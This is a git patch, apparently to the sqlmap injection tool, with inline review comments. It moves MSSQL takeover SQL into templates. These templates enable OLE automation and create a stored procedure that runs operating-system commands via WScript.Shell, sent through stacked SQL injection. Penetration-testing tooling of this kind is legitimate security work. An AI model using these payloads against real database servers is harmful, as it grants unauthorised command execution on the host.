From fd4cfb0cc09967a19ab7ecdd2bb0bb35da67199b Mon Sep 17 00:00:00 2001
From: Bernardo Damele
Date: Mon, 2 Jul 2012 15:28:19 +0100
Subject: [PATCH] working on #51

---
 lib/takeover/xp_cmdshell.py | 17 ++++-------------
 procs/mssqlserver/activate_sp_oacreate.txt | 4 ++++
 procs/mssqlserver/create_new_xp_cmdshell.txt | 8 ++++++++
 3 files changed, 16 insertions(+), 13 deletions(-)
 create mode 100644 procs/mssqlserver/activate_sp_oacreate.txt
 create mode 100644 procs/mssqlserver/create_new_xp_cmdshell.txt

diff --git a/lib/takeover/xp_cmdshell.py b/lib/takeover/xp_cmdshell.py
index b2921bfb4..9c80d7f3d 100644
--- a/lib/takeover/xp_cmdshell.py
+++ b/lib/takeover/xp_cmdshell.py
@@ -41,23 +41,14 @@ class xp_cmdshell:
         if Backend.isVersionWithin(("2005", "2008")):
             logger.debug("activating sp_OACreate")
 
-            cmd += "EXEC master..sp_configure 'show advanced options',1;"
-            cmd += "RECONFIGURE WITH OVERRIDE;"
-            cmd += "EXEC master..sp_configure 'ole automation procedures',1;"
-            cmd += "RECONFIGURE WITH OVERRIDE"
+            cmd = getSPQLSnippet(DBMS.MSSQL, "activate_sp_oacreate")
             inject.goStacked(agent.runAsDBMSUser(cmd))
 
         self.__randStr = randomStr(lowercase=True)
-        self.__xpCmdshellNew = randomStr(lowercase=True)
-        self.xpCmdshellStr = "master..xp_%s" % self.__xpCmdshellNew
+        self.__xpCmdshellNew = "xp_%s" % randomStr(lowercase=True)
+        self.xpCmdshellStr = "master..%s" % self.__xpCmdshellNew
 
-        cmd = "DECLARE @%s nvarchar(999);" % self.__randStr
-        cmd += "set @%s='" % self.__randStr
-        cmd += "CREATE PROCEDURE xp_%s(@cmd varchar(255)) AS DECLARE @ID int " % self.__xpCmdshellNew
-        cmd += "EXEC sp_OACreate ''WScript.Shell'',@ID OUT "
-        cmd += "EXEC sp_OAMethod @ID,''Run'',Null,@cmd,0,1 "
-        cmd += "EXEC sp_OADestroy @ID';"
-        cmd += "EXEC master..sp_executesql @%s" % self.__randStr
+        cmd = getSPQLSnippet(DBMS.MSSQL, "create_new_xp_cmdshell", RANDSTR=self.__randStr, XP_CMDSHELL_NEW=self.__xpCmdshellNew)
 
         if Backend.isVersionWithin(("2005", "2008")):
             cmd += ";RECONFIGURE WITH OVERRIDE"
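Review bot: `self.__xpCmdshellNew` now carries the `xp_` prefix itself, so any other consumer of that attribute that still formats it as `"xp_%s"` (none is visible in this hunk, so this is a check to make elsewhere in the class) would produce a double-prefixed name that no longer matches `self.xpCmdshellStr`. The first replacement also turns `cmd +=` into `cmd =`, which discards whatever `cmd` held before the `if`; that is fine only if it was initialised empty, which this hunk does not show. The second `getSPQLSnippet` call is the only place that ties the template's placeholders to these attributes, so a comment there would help the next reader, e.g. `# create_new_xp_cmdshell.txt substitutes %RANDSTR% (variable name) and %XP_CMDSHELL_NEW% (procedure name); both must stay identifier-safe`. The enclosing method starts and ends outside the hunk.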
diff --git a/procs/mssqlserver/activate_sp_oacreate.txt b/procs/mssqlserver/activate_sp_oacreate.txt
new file mode 100644
index 000000000..543ba6635
--- /dev/null
+++ b/procs/mssqlserver/activate_sp_oacreate.txt
@@ -0,0 +1,4 @@
+EXEC master..sp_configure 'show advanced options',1;
+RECONFIGURE WITH OVERRIDE;
+EXEC master..sp_configure 'ole automation procedures',1;
+RECONFIGURE WITH OVERRIDE"
diff --git a/procs/mssqlserver/create_new_xp_cmdshell.txt b/procs/mssqlserver/create_new_xp_cmdshell.txt
new file mode 100644
index 000000000..684d7eb23
--- /dev/null
+++ b/procs/mssqlserver/create_new_xp_cmdshell.txt
@@ -0,0 +1,8 @@
+DECLARE @%RANDSTR% nvarchar(999);
+set @%RANDSTR%='
+CREATE PROCEDURE %XP_CMDSHELL_NEW%(@cmd varchar(255)) AS DECLARE @ID int
+EXEC sp_OACreate ''WScript.Shell'',@ID OUT
+EXEC sp_OAMethod @ID,''Run'',Null,@cmd,0,1
+EXEC sp_OADestroy @ID';
+EXEC master..sp_executesql @%RANDSTR%
+
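Review bot: The last added line, `RECONFIGURE WITH OVERRIDE"`, ends with a stray double quote left over from the Python string literal this text was lifted out of (`cmd += "RECONFIGURE WITH OVERRIDE"` on the removed side). The Python caller passes the loaded snippet straight to `inject.goStacked` without appending anything, so that `"` reaches the server as the tail of the batch, where it opens an unterminated quoted identifier or string and the whole batch is rejected. Change the line to `RECONFIGURE WITH OVERRIDE` so the file matches the three statements above it.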
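Review bot: The eighth added line of create_new_xp_cmdshell.txt is empty, so the template ends with a blank line that activate_sp_oacreate.txt does not have; the Python caller appends `;RECONFIGURE WITH OVERRIDE` directly to the loaded text, so the blank is harmless but inconsistent and should be dropped. The placeholders `%RANDSTR%` and `%XP_CMDSHELL_NEW%` are spliced unquoted into identifier positions, so the template is only correct with identifier-only values such as the `randomStr(lowercase=True)` results the caller builds; that constraint belongs in the loader's or caller's documentation rather than as a `--` comment here, since any comment in this file would presumably be sent to the server as part of the batch unless the loader strips it. For consistency with `DECLARE`/`EXEC`, write `SET @%RANDSTR%='` rather than lowercase `set`.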